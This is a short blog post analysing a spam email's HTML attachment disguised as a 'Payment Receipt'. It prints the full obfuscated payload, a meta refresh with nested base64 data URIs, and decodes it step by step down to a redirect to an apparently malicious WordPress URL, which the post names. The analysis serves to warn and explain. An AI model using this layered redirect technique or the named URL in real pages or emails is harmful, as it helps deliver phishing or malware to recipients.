Hi all! It's been a while since I was here (a little over 2 years). A lot has changed. Anyway, let's get to it.
How Code injection is used
I've received 2 spam mails on my Yahoo account, which by the way, scans any attachments using Norton. There is an http attachment which I wouldn't recommend you clicking on to open a new browser tab or window. The attachment looks like this:
<html> <title> </title> <meta http-equiv="refresh" content="0;data:text/html;base64,DQo8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtDQoNCnRyYW5zaXRpb25hbC5kdGQiPjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPHRpdGxlPlBheW1lbnQgUmVjZWlwdDwvdGl0bGU+DQo8ZnJhbWVzZXQ+DQo8ZnJhbWUgLiANCg0Kc3JjPWRhdGE6dGV4dC9odG1sO2Jhc2U2NCxQRDgvUGxwb2RHMXNQanhvWldGa1BqeE5SVlJCSUVoVVZGQXRSVkZWU1ZZOUlsSmxabkpsYzJnaUlFTlBUbFJGVGxROUlqQTdWVkpNUFdoMGRIQTZMeTkwYUc5dVozUmhZMk52Ym1jMk1pNWpiMjB2ZDNBdGFXNWpiSFZrWlhNdmFXNWtlR1V1Y0dod0lqNDhMMmhsWVdRK1BIQStQSEErRFFvOEwyaGxZV1ENCg0KK1BDOWliMlI1UGp3dmFIUnRiRDQ9PjwvZnJhbWU+DQo8bm9mcmFtZXM+IHdhcyBub3QgZm91bmQhPC90aXRsZT4NCjxzY3JpcHQgbGFuZ3VhZ2U9IkphdmFTY3JpcHQiIHR5cGU9InRleHQvamF2YXNjcmlwdCI+ICAgIGZ1bmN0aW9uIHdpbm9wZW4odXJsLCBuYW1lKSB7ICAgICAgIHdpbmRvdy5vcGVuDQoNCih1cmwsIG5hbWUsICdzY3JvbGxiYXJzPTEscmVzaXphYmxlPW5vLHdpZHRoPTUwMCxoZWlnaHQ9MjUwLHN0YXR1cz0wLG1lbnViYXI9MCcpOyAgICB9ICA8L3NjcmlwdD48c2NyaXB0IA0KDQpsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9KYXZhU2NyaXB0Ij4NCjwhLS0NCmZ1bmN0aW9uIE1NX29wZW5CcldpbmRvdyh0aGVVUkwsd2luTmFtZSxmZWF0dXJlcykgeyAvL3YyLjANCiAgd2luZG93Lm9wZW4odGhlVVJMLHdpbk5hbWUsZmVhdHVyZXMpOw0KfQ0KLy8tLT4NCjwvc2NyaXB0Pg0KPC9ib2R5Pg0KPC9odG1sPg=="> </html>
That long line there is a meta tag. The <meta> tag provides metadata about the HTML document. Metadata will not be displayed on the page, but will be machine parsable. Meta elements are typically used to specify page description, keywords, author of the document, last modified, and other metadata. The metadata can be used by browsers (how to display content or reload page), search engines (keywords), or other web services.
You can use a decrypt software or online to convert the text. Here, it's base64, and converting the meta value for content would result in this:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Payment Receipt</title>
<frameset>
<frame .
src=data:text/html;base64,PD8/PlpodG1sPjxoZWFkPjxNRVRBIEhUVFAtRVFVSVY9IlJlZnJlc2giIENPTlRFTlQ9IjA7VVJMPWh0dHA6Ly90aG9uZ3RhY2Nvbmc2Mi5jb20vd3AtaW5jbHVkZXMvaW5keGUucGhwIj48L2hlYWQ+PHA+PHA+DQo8L2hlYWQ
+PC9ib2R5PjwvaHRtbD4=></frame>
<noframes> was not found!</title>
<script language="JavaScript" type="text/javascript"> function winopen(url, name) { window.open
(url, name, 'scrollbars=1,resizable=no,width=500,height=250,status=0,menubar=0'); } </script><script
language="JavaScript" type="text/JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//-->
</script>
</body>
</html>
This shows the title of the email and you'll also notice it's running a javascript to open a new window linking to another site. There's another base64 encryption there that gives us the clue:
<??>Zhtml><head><META HTTP-EQUIV="Refresh" CONTENT="0;URL=http://thongtaccong62.com/wp-includes/indxe.php"></head><p><p> </head></body></html>
And that's where the malware redirects us.
No comments:
Post a Comment